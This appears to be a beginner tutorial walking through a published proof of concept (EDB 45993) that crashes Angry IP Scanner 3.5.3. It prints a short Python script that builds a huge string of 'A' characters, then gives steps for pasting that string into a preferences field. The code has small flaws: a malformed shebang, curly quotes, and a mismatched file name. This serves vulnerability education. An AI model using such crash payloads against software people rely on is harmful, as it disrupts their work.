Difficulty Level : Beginner
Introduction : Angry IP scanner is a very fast IP address and port scanner. It can scan IP addresses in any range as well as any their ports. It is cross-platform and lightweight. Not requiring any installations, it can be freely copied and used anywhere. Angry IP scanner simply pings each IP address to check if it’s alive, then optionally it is resolving its hostname, determines the MAC address, scans ports, etc. The amount of gathered data about each host can be extended with plugins.
About Denial Of service Attack :
A Denial-of-Service (DoS) attack is an attack meant to shut down a machine or network, making it inaccessible to its intended users. DoS attacks accomplish this by flooding the target with traffic or sending it information that triggers a crash.
Vulnerable Application : Angry IP Scanner 3.5.3 is vulnerable by Denial of Service
EDB Id : 45993
CVE : NA
Published : 2018–12–14
Type : DoS
Platform : Windows
Author : FERNANDO CRUZ
Exploit Reference : https://www.exploit-db.com/exploits/45921
Download link of vulnerable Application : https://www.exploit-db.com/apps/ba444fae91469450011e2b0f12a9c436-ipscan-3.5.3-setup.exe
Download link of exploit : https://www.exploit-db.com/download/45993
Proof Of Concept.
Step:1 We have to download the vulnerable application Angry ip scanner version 3.5.3 from here. and install.
Step:2 After installing the vulnerable application the next stage is to download the exploit, You can download exploit from here.
Let’s see python script code:
#!usr/bin/python
buffer = “\x41” * 44455293 # Here buffer is created with 44455293 “A” characters, \x41 is equivalent to ‘A’
f = open(“angryip.txt” , ‘w’) # Here open ()is function that create a file “angryip.txt” , ‘ w’ is mode that will open file .
f.write(buffer) # Here write is method that writes the strings of variable buffer to file “angryip.txt”
f.close() # This method close the file.
Step:3 Now execute our exploit named as 45993.py.
Command for execute exploit. python 49993.py
Go to download location and execute exploit.
As we execute the exploit it will create a “angryip.txt” file. Open “angryip.txt” file and copy all the strings in clipboard.
Step:4 Now let’s open Angry ip scanner 3.5.3 . A default application screen will appear like this.
Step 5: After opening the application we have to find the input field which is vulnerable by DoS. So go to Tools tab and click on preference menu.A small window will open, click on Display Tab.
Here we find a block which name is “label display In result field”
Paste the strings of ‘angryip.txt’ file in the textfield that we have copied earlier in clipboard.
After pasting the strings click on ok button.
When we click ok button the application gives memory error and after some seconds application is completely crashed.
